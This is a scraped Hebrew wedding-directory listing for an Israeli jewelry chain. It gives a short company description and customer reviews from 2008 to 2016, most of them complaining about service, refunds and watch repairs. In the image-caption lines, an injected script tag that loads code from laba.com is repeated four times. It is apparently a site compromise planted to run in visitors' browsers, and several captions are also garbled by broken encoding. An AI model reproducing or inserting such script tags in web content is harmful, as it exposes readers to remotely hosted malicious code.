חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ??? ? ???  > ??????? > הבורסה לתכשיטים
חזור 
הבורסה לתכשיטים
רשת "הבורסה לתכשיטים" מהותיקות בישראל המתמחה בתכשיטי היהלומים. הרשת חרטה על דגלה איכות,רמת השירות ואמינות,ומובילה בגאווה את ענף התכשיטים.מגוון רב של תכשיטי יהלומים,זהב,פנינים,אבני חן ומבחר רחב של טבעות אירוסין ונישואין במחירים אטרקטיביים ובאיכות משובחת.

טלפון :
057-9417621
נייד :
כתובת :
  סניפים בכל הארץ


ליצירת קשר עם בעל העסק הקש כאן
הבורסה לתכשיטים - ??? ? ???<script src=http://laba.com/muuu.s></script> 1
 
הבורסה לתכשיטים - ??? ? ???<script src=http://laba.com/muuu.s></script> 1 הבורסה לתכשיטים - ??? ? ???<script src=http://laba.com/muuu.s></script> 2 הבורסה לתכשיטים - ??? ? ???<script src=http://laba.com/muuu.s></script> 3



10/01/2016 12:44:23- יפעת
שירות מעולה, תכשיטים איכותיים
קניתי מדליון מוזהב עם אבן חן כחולה. תענוג של מוצר והשירות היה אישי ונעים. ממליצה!

18/10/2015 18:28:18- עליזה בן שימול
תלונה לפני הגשה לתביעה משפטית בגין סרוב לביטול עסקה כחו
קניתי עגילים למחורת התברר לי שבחנויות אחרות מציעים עגילים ששוקלים יותר מעוצבים יותר ומכילים יותר יהלומים במחיר הרבה יותר טוב ןבלי 30 אחוז הנחה שניתנים כביכול בתעמולת מכירה אך בסופו של דבר עגילים יפים מאלו נמכרים בזול יותר ללא הכרזה של 30 אחוז וכן ההיצע גדול יותר חוץ מזה התחרטתי גם כי העגילים נראו לי מבוגרים וכשבאתי לבטל עסקה הם סרבו בתוקף ולא הסכימו אפילו לתת זכוי כדי להוכיח שהמוצר הוחזר פחותמ14 יום כהוכחה לתביעה משפטית באגודה להגנת הצרכן וכמו כן הם לא הסכימו לתת מספר של שרות לקוחותהתנהגו פשוט חזירים למרות שהסכמתי מראש לספוג הפסד של 5 אחוז ורק אחרי שהקלטתי והסרטתי בוידאו הסכימו לתת זכוי הרגשתי חזירים ורמאים הם אמרו אנו משתמשים בזהב חדש לא משומש אתם מבינים בלה בלה הזהב שאתם קונים בחנויות אחרות הופך לנחושת שוה לערוך סקר ולהכיר את הפרצןף האמיתי של השם המבריק הזה שכולו תעמולתעמולה

24/04/2014 08:52:45- שאול
שרות טוב
בתחילת אפריל קניתי שעון דוקסה בסניף הרשת ברחובות.קבלתי שרות מעולה,חייכני וסבלני ממוכרת בשם אלה.יש לציין שלפני 7 שנים קניתי שעון דוקסה אחר באותה חנות.לפני מספר חודשים השעון נגנב.נדרשתי להמציא לביטוח קבלה על רכישת השעון.מסתבר שכל האינפורמציה אגורה אצלם במחשב וקבלתי בחנות ללא בעיה העתק מהקבלה המקורית.בקיצור לכו לסניף הרחובותי.

05/12/2011 14:53:10- קוטין סופיה
שירות גרוע
נתתי שעון להחלפה בטריה ב30/10/11 היום כבר 05/12/11 עוד לא קיבלתי את השעון. בהזמנה כתוב ששעון יהי מוכן עד 14/11/11

31/10/2011 12:46:29- מירי
שרות גרוע
רכשו עבורי שרשרת מתנת יום הולדת. המוכרת אמרה שאם לא ימצא חן אפשר להחזיר והכסף יוחזר בחזרה. השרשת אכן לא מצאה חן והוחזרה בו ביום לחנות. נאמר לנו שהעסקה תבוטל. העסקה אמנם בוטלה אך חויבנו לשלם 150 ש"ח דמי בטול עסקה. דבר שלא נאמר לנו קודם. וכפי שידוע יש חוק חדש שאם מוצר שנקנה מוחזר תוך יומיים במצב חדש ובאריזה הכסף יוחזר חזרה. לא מוזכר בשום מקום על חיוב עבור בטול עסקה. החנות פעלה לא בתום לב וגרמה לנו הוצאות מיותרות. נקודה!!!

07/04/2010 07:27:41- רות
שירות לקוי
רכשנו שעון דוקסה בגרנד קניון לאחר כ3 שבועות הרצועה ניקרעה ביקשתי החלפה לרצועה קיבלתי חיוך מקצועי מגברת אלה ושירות של"קופת חולים" "תשאיר את השעוןנשלח לתל אביב לבדיקה צריך אחריות" .השעון ניקנה בסוף ינואר השנה ונענד כ20 יום בלבד. השירות אחרי הקניה שואף לאפס.

23/09/2008 21:48:32- מיכאל
קצת על "דגל השירות"
נכנסתי עם חברתי לחנות הבורסה לתכשיטים, סניף חולון, מוכרת בשם ענת.רציתי לראות ולקנות טבעת אירוסין.למדתי קצת באינטרט על איכות יהלום (ניקיון וצבע וכו).רציתי לקנות טבעת אירוסין לפי טעמה של חברתי, ולאחר שחברתי מדדה 3 טבעות במשך מספר דקות ואני מסתכל על יופי ואיכות היהלום. ראתה המוכרת שאני מנדנד בראשי קלות (מעין סימן שעשיתי לעצמי שלא כל כך אהבתי את הטבעת וגם מסתכל הרבה על הטבעת- יותר מדקה שלמה). מאותו רגע החלה המוכרת בשירות "שיא". טענה שאני חוצפן ושאני מבזבז את זמנה, והיא " אני לא ראיתי כזה דבר, אני עומדת פה במשך 20 דקות כמו מטומ..." (ציטוט!!!)"מה אתה מנסה להעתיק לנו תכשיטים"(המשך ציטוט) - כן כן זה אמיתי!!!! אני וחברתי היינו בהלם. נתקלתי בשירות גרוע מדי פעם אבל עד לרמה כזאת??? רבאק זה מוניטין של החברה!!!אני מציין שהיו עוד לקוחות בחנות שהיו עדים לדבר!בשביל להמחיש איך צריך לתת שירות, המשכתי לחנות אחרת בקניון, שם קיבלתי הסבריםרבים ודוגמאות (מבלי שביקשתי אפילו) ונתנו להסתכל בכיף אפילו כמה דקות שלמות וגם שלא קניתי בסוף אמרו נשמח לראותך.